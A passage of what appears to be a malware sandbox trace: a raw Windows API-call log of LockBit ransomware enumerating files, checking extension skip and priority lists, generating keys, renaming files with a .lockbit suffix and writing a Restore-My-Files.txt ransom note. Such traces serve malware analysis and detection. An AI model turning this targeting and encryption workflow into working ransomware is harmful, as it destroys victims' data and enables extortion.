lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0152.912] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0152.912] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0152.913] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0152.913] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0152.913] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0227419.JPG") returned 1 [0152.913] lstrcmpiW (lpString1="ntldr", lpString2="J0227419.JPG") returned 1 [0152.913] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0227419.JPG") returned 1 [0152.913] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0227419.JPG") returned -1 [0152.913] lstrcmpiW (lpString1="autorun.inf", lpString2="J0227419.JPG") returned -1 [0152.913] lstrcmpiW (lpString1="thumbs.db", lpString2="J0227419.JPG") returned 1 [0152.913] lstrcmpiW (lpString1="iconcache.db", lpString2="J0227419.JPG") returned -1 [0152.913] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.913] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG") returned=".JPG" [0152.913] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0152.913] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0152.913] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0152.913] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0152.914] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0152.914] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0152.914] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0152.914] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG.lockbit") returned 72 [0152.914] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227419.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0152.915] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.915] malloc (_Size=0x40068) returned 0x3d70450 [0152.915] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=35542) returned 1 [0152.915] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.916] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.916] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0152.916] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.917] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.917] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0152.917] ReadFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0152.923] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.923] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.923] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.924] free (_Block=0x1fa2ed8) [0152.924] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227419.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.924] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.924] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.924] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe2e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0227558.JPG", cAlternateFileName="")) returned 1 [0152.925] lstrcmpiW (lpString1=".", lpString2="J0227558.JPG") returned -1 [0152.925] lstrcmpiW (lpString1="..", lpString2="J0227558.JPG") returned -1 [0152.925] PathFindExtensionW (pszPath="J0227558.JPG") returned=".JPG" [0152.925] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0152.925] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0152.925] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0152.926] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0152.926] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0227558.JPG") returned 1 [0152.927] lstrcmpiW (lpString1="ntldr", lpString2="J0227558.JPG") returned 1 [0152.927] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0227558.JPG") returned 1 [0152.927] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0227558.JPG") returned -1 [0152.927] lstrcmpiW (lpString1="autorun.inf", lpString2="J0227558.JPG") returned -1 [0152.927] lstrcmpiW (lpString1="thumbs.db", lpString2="J0227558.JPG") returned 1 [0152.927] lstrcmpiW (lpString1="iconcache.db", lpString2="J0227558.JPG") returned -1 [0152.927] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.927] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG") returned=".JPG" [0152.927] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0152.927] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0152.927] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0152.928] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0152.928] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0152.929] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0152.929] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0152.929] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0152.929] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0152.929] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG.lockbit") returned 72 [0152.929] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0227558.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0152.941] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.941] malloc (_Size=0x40068) returned 0x3df0008 [0152.941] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=58089) returned 1 [0152.941] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0152.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0152.942] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0152.945] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.945] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.945] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.946] free (_Block=0x1fa2ed8) [0152.946] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0227558.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0152.946] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0152.946] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0152.946] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaccb1700, ftCreationTime.dwHighDateTime=0x1be8602, ftLastAccessTime.dwLowDateTime=0x565cf3f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xaccb1700, ftLastWriteTime.dwHighDateTime=0x1be8602, nFileSizeHigh=0x0, nFileSizeLow=0x65a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0228823.WMF", cAlternateFileName="")) returned 1 [0152.946] lstrcmpiW (lpString1=".", lpString2="J0228823.WMF") returned -1 [0152.946] lstrcmpiW (lpString1="..", lpString2="J0228823.WMF") returned -1 [0152.946] PathFindExtensionW (pszPath="J0228823.WMF") returned=".WMF" [0152.946] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0152.946] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0152.947] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0152.947] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0152.948] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0228823.WMF") returned 1 [0152.948] lstrcmpiW (lpString1="ntldr", lpString2="J0228823.WMF") returned 1 [0152.948] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0228823.WMF") returned 1 [0152.948] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0228823.WMF") returned -1 [0152.948] lstrcmpiW (lpString1="autorun.inf", lpString2="J0228823.WMF") returned -1 [0152.948] lstrcmpiW (lpString1="thumbs.db", lpString2="J0228823.WMF") returned 1 [0152.948] lstrcmpiW (lpString1="iconcache.db", lpString2="J0228823.WMF") returned -1 [0152.949] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0152.949] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF") returned=".WMF" [0152.949] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0152.949] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0152.949] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0152.949] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF.lockbit") returned 72 [0152.950] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0228823.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0152.950] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0152.950] malloc (_Size=0x40068) returned 0x3e70008 [0152.950] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=26022) returned 1 [0152.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0152.951] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0152.951] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0152.951] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0152.951] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0152.955] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0228823.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0152.956] malloc (_Size=0xa6) returned 0x1fa2ed8 [0152.956] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0152.956] free (_Block=0x1fa2ed8) [0152.956] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft 